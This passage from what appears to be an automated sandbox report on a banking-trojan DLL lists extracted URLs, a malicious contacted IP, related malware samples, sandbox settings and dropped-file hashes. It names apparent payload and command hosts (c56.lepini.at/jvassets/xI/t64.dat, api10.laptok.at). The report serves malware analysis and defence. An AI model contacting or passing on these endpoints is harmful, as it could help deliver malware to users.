                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            http://search.nifty.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://searchresults.news.com.au/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://www.google.si/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.google.cz/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.soso.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://www.univision.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://search.ebay.it/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.amazon.com/msapplication.xml.3.drfalse
                                                                                                                          		high
                                                                                                                          http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.asharqalawsat.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            http://busca.orange.es/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://www.twitter.com/msapplication.xml5.3.drfalse
                                                                                                                                  		high
                                                                                                                                  http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000021.00000000.412493518.0000000006100000.00000002.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://search.yahoo.co.jpexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    http://www.target.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://buscador.terra.es/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      http://www.typography.netDexplorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      http://fontfabrik.comexplorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      http://search.orange.co.uk/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown

                                                                                                                                      Contacted IPs

                                                                                                                                      • No. of IPs < 25%
                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                      • 75% < No. of IPs

                                                                                                                                      Public

                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                      47.241.19.44
                                                                                                                                      		unknownUnited States
                                                                                                                                      		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue

                                                                                                                                      Private

                                                                                                                                      IP
                                                                                                                                      192.168.2.1

                                                                                                                                      General Information

                                                                                                                                      Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                      Analysis ID:322295
                                                                                                                                      Start date:24.11.2020
                                                                                                                                      Start time:21:18:13
                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                      Overall analysis duration:0h 13m 36s
                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                      Report type:full
                                                                                                                                      Sample file name:onerous.tar.dll
                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                      Number of analysed new started processes analysed:38
                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                      Number of injected processes analysed:2
                                                                                                                                      Technologies:
                                                                                                                                      • HCA enabled
                                                                                                                                      • EGA enabled
                                                                                                                                      • HDC enabled
                                                                                                                                      • AMSI enabled
                                                                                                                                      Analysis Mode:default
                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                      Detection:MAL
                                                                                                                                      Classification:mal100.bank.troj.evad.winDLL@25/54@4/2
                                                                                                                                      EGA Information:Failed
                                                                                                                                      HDC Information:
                                                                                                                                      • Successful, ratio: 5% (good quality ratio 4.7%)
                                                                                                                                      • Quality average: 77.5%
                                                                                                                                      • Quality standard deviation: 28.3%
                                                                                                                                      HCA Information:
                                                                                                                                      • Successful, ratio: 86%
                                                                                                                                      • Number of executed functions: 106
                                                                                                                                      • Number of non-executed functions: 221
                                                                                                                                      Cookbook Comments:
                                                                                                                                      • Adjust boot time
                                                                                                                                      • Enable AMSI
                                                                                                                                      • Found application associated with file extension: .dll
                                                                                                                                      Warnings:
                                                                                                                                      Show All
                                                                                                                                      • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, UsoClient.exe
                                                                                                                                      • Excluded IPs from analysis (whitelisted): 13.88.21.125, 52.255.188.83, 104.108.39.131, 51.104.144.132, 2.18.68.82, 20.54.26.129, 152.199.19.161, 51.103.5.159, 92.122.213.194, 92.122.213.247
                                                                                                                                      • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, par02p.wns.notify.windows.com.akadns.net, go.microsoft.com, emea1.notify.windows.com.akadns.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, ie9comview.vo.msecnd.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus15.cloudapp.net, cs9.wpc.v0cdn.net
                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                                                                      Simulations

                                                                                                                                      Behavior and APIs

                                                                                                                                      TimeTypeDescription
                                                                                                                                      21:20:19API Interceptor41x Sleep call for process: powershell.exe modified
                                                                                                                                      21:20:44API Interceptor1x Sleep call for process: loaddll32.exe modified

                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                      IPs

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                      47.241.19.440xyZ4rY0opA2.vbsGet hashmaliciousBrowse
                                                                                                                                      • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                      6Xt3u55v5dAj.vbsGet hashmaliciousBrowse
                                                                                                                                      • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                      JeSoTz0An7tn.vbsGet hashmaliciousBrowse
                                                                                                                                      • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                      1qdMIsgkbwxA.vbsGet hashmaliciousBrowse
                                                                                                                                      • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                      2Q4tLHa5wbO1.vbsGet hashmaliciousBrowse
                                                                                                                                      • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                      0wDeH3QW0mRu.vbsGet hashmaliciousBrowse
                                                                                                                                      • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                      0k4Vu1eOEIhU.vbsGet hashmaliciousBrowse
                                                                                                                                      • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                      earmarkavchd.dllGet hashmaliciousBrowse
                                                                                                                                      • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                      6znkPyTAVN7V.vbsGet hashmaliciousBrowse
                                                                                                                                      • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                      a7APrVP2o2vA.vbsGet hashmaliciousBrowse
                                                                                                                                      • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                      03QKtPTOQpA1.vbsGet hashmaliciousBrowse
                                                                                                                                      • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                      2200.dllGet hashmaliciousBrowse
                                                                                                                                      • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                      22.dllGet hashmaliciousBrowse
                                                                                                                                      • api10.laptok.at/favicon.ico
                                                                                                                                      mRT14x9OHyME.vbsGet hashmaliciousBrowse
                                                                                                                                      • api10.laptok.at/favicon.ico
                                                                                                                                      0RLNavifGxAL.vbsGet hashmaliciousBrowse
                                                                                                                                      • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                      1ImYNi1n8qsm.vbsGet hashmaliciousBrowse
                                                                                                                                      • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                      4N9Gt68V5bB5.vbsGet hashmaliciousBrowse
                                                                                                                                      • api10.laptok.at/favicon.ico
                                                                                                                                      34UO9lvsKWLW.vbsGet hashmaliciousBrowse
                                                                                                                                      • api10.laptok.at/favicon.ico
                                                                                                                                      csye1F5W042k.vbsGet hashmaliciousBrowse
                                                                                                                                      • api10.laptok.at/favicon.ico
                                                                                                                                      0cJWsqWE2WRJ.vbsGet hashmaliciousBrowse
                                                                                                                                      • api10.laptok.at/favicon.ico

                                                                                                                                      Domains

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                      api10.laptok.at0xyZ4rY0opA2.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      6Xt3u55v5dAj.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      JeSoTz0An7tn.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      1qdMIsgkbwxA.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      2Q4tLHa5wbO1.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      0wDeH3QW0mRu.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      0k4Vu1eOEIhU.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      earmarkavchd.dllGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      6znkPyTAVN7V.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      a7APrVP2o2vA.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      03QKtPTOQpA1.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      2200.dllGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      22.dllGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      mRT14x9OHyME.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      0RLNavifGxAL.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      1ImYNi1n8qsm.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      4N9Gt68V5bB5.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      34UO9lvsKWLW.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      csye1F5W042k.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      0cJWsqWE2WRJ.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      c56.lepini.at0xyZ4rY0opA2.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      6Xt3u55v5dAj.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      JeSoTz0An7tn.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      1qdMIsgkbwxA.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      2Q4tLHa5wbO1.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      0wDeH3QW0mRu.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      0k4Vu1eOEIhU.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      earmarkavchd.dllGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      6znkPyTAVN7V.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      a7APrVP2o2vA.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      03QKtPTOQpA1.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      2200.dllGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      0RLNavifGxAL.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      1ImYNi1n8qsm.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      http://c56.lepini.atGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44

                                                                                                                                      ASN

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                      CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC0xyZ4rY0opA2.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      6Xt3u55v5dAj.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      http://qaht.midlidl.com/indexGet hashmaliciousBrowse
                                                                                                                                      • 8.208.98.199
                                                                                                                                      https://bit.ly/3nLKwPuGet hashmaliciousBrowse
                                                                                                                                      • 8.208.98.199
                                                                                                                                      Response_to_Motion_to_Vacate.docGet hashmaliciousBrowse
                                                                                                                                      • 47.254.169.80
                                                                                                                                      https://bit.ly/2UR10cFGet hashmaliciousBrowse
                                                                                                                                      • 8.208.98.199
                                                                                                                                      JeSoTz0An7tn.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      1qdMIsgkbwxA.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      https://bit.ly/3lYk4BxGet hashmaliciousBrowse
                                                                                                                                      • 8.208.98.199
                                                                                                                                      2Q4tLHa5wbO1.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      https://bouncy-alpine-yam.glitch.me/#j.dutheil@dagimport.comGet hashmaliciousBrowse
                                                                                                                                      • 47.254.218.25
                                                                                                                                      0wDeH3QW0mRu.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      0k4Vu1eOEIhU.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      https://bit.ly/35MTO80Get hashmaliciousBrowse
                                                                                                                                      • 8.208.98.199
                                                                                                                                      videorepair_setup_full6715.exeGet hashmaliciousBrowse
                                                                                                                                      • 47.91.67.36
                                                                                                                                      http://banchio.com/common/imgbrowser/update/index.phpGet hashmaliciousBrowse
                                                                                                                                      • 47.241.0.4
                                                                                                                                      earmarkavchd.dllGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      6znkPyTAVN7V.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      a7APrVP2o2vA.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      03QKtPTOQpA1.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44

                                                                                                                                      JA3 Fingerprints

                                                                                                                                      No context

                                                                                                                                      Dropped Files

                                                                                                                                      No context

                                                                                                                                      Created / dropped Files

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{C152A98E-2EDD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:Microsoft Word Document
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):29272
                                                                                                                                      Entropy (8bit):1.7738811488176964
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:rHZMZ928cx9W8pLdt8pDpf8phANM8pGf827B:rHZMZ928cx9W8vt8Fpf8vANM8Yf8YB
                                                                                                                                      MD5:A3C986346E381979C8B7FF0E295E4A1C
                                                                                                                                      SHA1:E0C81809FAB44BA2F42D1BD0385210480A21747D
                                                                                                                                      SHA-256:F5360641C2C41DF8CB888BEA48789AACE3A6E0EB5E17AE74431EE61EE4121098
                                                                                                                                      SHA-512:7CAA977208364696DA94E56DED347DE330491EC529F0E41AF9717C431ED2EDB832268693761B9CEB2C91E7A30A377FF10891B87F4CB74209515935BB56D1BA4C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{DC6A3E1D-2EDD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:Microsoft Word Document
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):71272
                                                                                                                                      Entropy (8bit):2.0467308111060736
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:rlZyZI299WRZtDfO1Mh3GtesD+tt6KmseKkSVOSGOCSmsiBhVtiv1mw1VrizY1hU:rruf9URLjzFGHaROKiDiRizpMzg
                                                                                                                                      MD5:27CB7067349AD628F3167C98BE8BA56E
                                                                                                                                      SHA1:67A8CBE516489D9A23666BB973040CA03FAD967C
                                                                                                                                      SHA-256:523D34792AB0EA3E62C208306C40EB049E011004AB7ACE7044119938002D4940
                                                                                                                                      SHA-512:E3DC29904BAB3F2D70906DD20D4BB327B9889933609224910B8083464A5F28A1E3B591F9E87EF78A9FDC7733D887598C7DB8D49B7438567C413B62E648A89736
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{C152A990-2EDD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:Microsoft Word Document
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):27592
                                                                                                                                      Entropy (8bit):1.9191146948002127
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:rrZBiQkz623kIFj52skWOMuYBvqtlvqLgA:r9J3bIhIYnuIvWvA
                                                                                                                                      MD5:C0D309DF982E079C8D13B71F3742CDE8
                                                                                                                                      SHA1:3C0C8B011F7D3A9FA4A918993249212EE98A2423
                                                                                                                                      SHA-256:FB865E3D5572506172E428FF5C8181FEB5F7E5F691E4D34E9039FE0679C389C7
                                                                                                                                      SHA-512:4640038DD51D3FA19EDD5B646B28F46347FCB0812FB581850045D7EF4D362072CB8979925BAEED373A28C87FE5049CFA8426D043312BB7F4BD9C1704FA81B3A1
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{DC6A3E1F-2EDD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:Microsoft Word Document
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):27600
                                                                                                                                      Entropy (8bit):1.9187028135850674
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:rJZeQe6gkAFj520kWhMUY5INbW1I92NbfoA:r/bptAhIg6UwabO5bj
                                                                                                                                      MD5:33231CC9EC2C9C3202D8F3B8BBAC1B9E
                                                                                                                                      SHA1:E6147AEC076FB9CC8BB3B211B31F3FC2D823E670
                                                                                                                                      SHA-256:535C6F8B2D99A2344A1E6103C675F9A4B3A60E6F443B0FA8335887837A347631
                                                                                                                                      SHA-512:B840E17D440272F44B27FA64295E680F912E3EE3D5B6E16C5B39B350CA37C2DBEE9A25ED75E8DEE61C92A437863B6EA5E06C2AC5660D108653B5C32AA0087DE3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{DC6A3E21-2EDD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:Microsoft Word Document
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):28692
                                                                                                                                      Entropy (8bit):1.9204507076447392
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:rBXZiQHz6NkEFjB2ckWXM+Ylw3DlDNb1E3DlDNJr:rBJPHW2EhwI8+Mw35HE357
                                                                                                                                      MD5:6F4D8329020DDEA4354B398FF20C7AAE
                                                                                                                                      SHA1:5BEF65ED9DD663598B49B2B8F730C056E48333C8
                                                                                                                                      SHA-256:93F57556211625DF04ABAC6D2EA6A1C267D8B02ECA56401612B13FF88D86D342
                                                                                                                                      SHA-512:7A0377926FB4764816F6B09F03C6CA046D1E8B19796DC8B17E8004B49B822B4FBE5EA482C7FF0DDC21D1BC6F5AD4A8A3878662863CCC21E4563910AB6436A4C0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{E26E6CA8-2EDD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:Microsoft Word Document
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):28140
                                                                                                                                      Entropy (8bit):1.9188053866160313
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:rAZLQH6dkWFjf2ukWVMwYNfYJwlfaYJX14A:rwkaGWhOKWwEgKxt1b
                                                                                                                                      MD5:E5DECC73807B0E0B79C71BACA4C7DB4B
                                                                                                                                      SHA1:DAA38D791EB71D2F9B44C59915522C46816C92BA
                                                                                                                                      SHA-256:0950B5299958686489E3F258393C6AB71E732D7BE3C4FF041592E3BFD52B5694
                                                                                                                                      SHA-512:C5ADB7661E65EA01343BDA5D49D7A77D784FC639D2C1E190989180EA9F03EF41765C181AC894BB613A7542E0AE45DC1883A80988938D7B2A9445749C65E9EDA9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):656
                                                                                                                                      Entropy (8bit):5.077401580149026
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:TMHdNMNxOE0KdWpKdWX4nWimI002EtM3MHdNMNxOE0KdWpKdWX4nWimI00ObVbkt:2d6NxO+fK4SZHKd6NxO+fK4SZ76b
                                                                                                                                      MD5:1BE4A1F7F451CEEBE27D331E3F75EB62
                                                                                                                                      SHA1:30BD0677580A78C32576AED6973579E27BB3439F
                                                                                                                                      SHA-256:F313CA1F1598B33E2116F6DB66C205BFF45876EB41BBB53653E8C4E063DFF943
                                                                                                                                      SHA-512:E0337672D9644879ED87AA7592333F0F8EC0507587EB955A803FFD331E62F16BC9D671B8BC58B95954807DD1CA558F518A96AB3AF5907E563D83E7C724BE9DBE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x98a8d38c,0x01d6c2ea</date><accdate>0x98a8d38c,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x98a8d38c,0x01d6c2ea</date><accdate>0x98a8d38c,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):653
                                                                                                                                      Entropy (8bit):5.093006023686203
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:TMHdNMNxe2ksDlxDlX4nWimI002EtM3MHdNMNxe2ksDlxDlX4nWimI00Obkak6Es:2d6Nxrp4SZHKd6Nxrp4SZ7Aa7b
                                                                                                                                      MD5:8BA10CB684BCA2596B80CDF6672B8AED
                                                                                                                                      SHA1:E18BD4F47888E0B4E89B5A45FF4ED5A87C1C26D5
                                                                                                                                      SHA-256:04065D56E43CD36AA4E36B26061C33D534291B08879915E12D467328A8E06643
                                                                                                                                      SHA-512:E8CE02D03D868CA8DA4B9555F3A336C5484B7D309E17CE9160767753023342ABC799942F058CC2CB07BD37BA07879138B91D6EFBF7A5F7B057880B74B149BB99
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x989ce7de,0x01d6c2ea</date><accdate>0x989ce7de,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x989ce7de,0x01d6c2ea</date><accdate>0x989ce7de,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):662
                                                                                                                                      Entropy (8bit):5.122194032135596
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:TMHdNMNxvL02Tp2TX4nWimI002EtM3MHdNMNxvL02Tp2TX4nWimI00ObmZEtMb:2d6NxvQ4SZHKd6NxvQ4SZ7mb
                                                                                                                                      MD5:7CA8697F7CC6EB2AE1AD1DCDEFE99E45
